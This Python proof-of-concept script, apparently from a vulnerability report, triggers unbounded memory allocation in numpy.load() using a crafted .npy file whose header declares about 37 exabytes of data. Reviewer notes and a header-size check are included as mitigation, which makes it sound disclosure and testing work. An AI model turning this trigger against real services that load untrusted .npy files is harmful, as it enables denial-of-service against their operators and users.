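"""
NumPy CWE-789 Trigger
======================
Loads bomb.npy and calls numpy.load(), which triggers:
read_array() → count = numpy.multiply.reduce(shape) = 4.6e18
→ numpy.ndarray(4611686018427387904, dtype=float64)
→ ~37 exabyte allocation attempt → MemoryError or OOM kill

Expected: MemoryError or process kill by OOM killer.

Size arithmetic: 2**62 float64 elements * 8 bytes = 2**65 bytes, which is
32 EiB in binary units (about 36.9 EB in decimal units).

Reviewer notes:
- NOTE(review): for a real on-disk file, read_array() may take the
  numpy.fromfile(fp, dtype, count) path instead of numpy.ndarray(count);
  confirm the call chain against the installed numpy version.
- NOTE(review): 2**65 bytes does not fit in a 64-bit size_t, so numpy may
  reject the request with its own exception (e.g. ValueError) before any
  allocation is attempted. That outcome lands in the generic ``except``
  branch below and should be read as "header rejected", not as a failure
  of the test.
- Run this under a memory cap (container/cgroup limit or ``ulimit -v``)
  so that an OOM kill, if it happens, stays confined to this process.
- Mitigation for code that loads .npy files from outside its trust
  boundary: read the header first (numpy.lib.format.read_magic followed by
  read_array_header_1_0 / read_array_header_2_0) and compare the declared
  element count * itemsize with the actual file size before calling
  numpy.load().
"""

import os
import sys

import numpy as np

# The test file is expected next to this script; it is produced separately.
npy = os.path.join(os.path.dirname(__file__), 'bomb.npy')
if not os.path.exists(npy):
    print(f"[-] {npy} not found — run make_poc.py first")
    sys.exit(1)

# Record the library version and on-disk size: the point of the test is the
# gap between a tiny file and the allocation size its header declares.
print(f"[*] numpy version: {np.__version__}")
print(f"[*] File: {npy} ({os.path.getsize(npy)} bytes)")

# flush=True so these lines reach the terminal even if the process is
# killed before normal buffer flushing.
print("[*] Calling numpy.load()...", flush=True)
print("[*] Expected: MemoryError or OOM kill from 32 EiB (~37 EB) allocation attempt", flush=True)

try:
    # allow_pickle=False is stated explicitly so an object-dtype file can
    # never reach the unpickler, including on older numpy releases whose
    # default allowed pickles. It does not affect the float64 path tested here.
    arr = np.load(npy, allow_pickle=False)
    print(f"[!] Loaded without crash — unexpected: shape={arr.shape}, size={arr.nbytes/1024**4:.1f} TiB")
except MemoryError as e:
    # The allocation was requested and refused.
    print(f"[+] CRASH: MemoryError — confirmed unbounded allocation from shape (2^31, 2^31): {e}")
except Exception as e:
    # Any other exception: numpy (or the OS) rejected the file some other
    # way; the exception type printed here tells which.
    print(f"[*] Exception: {type(e).__name__}: {e}")
finally:
    print("[*] Done", flush=True)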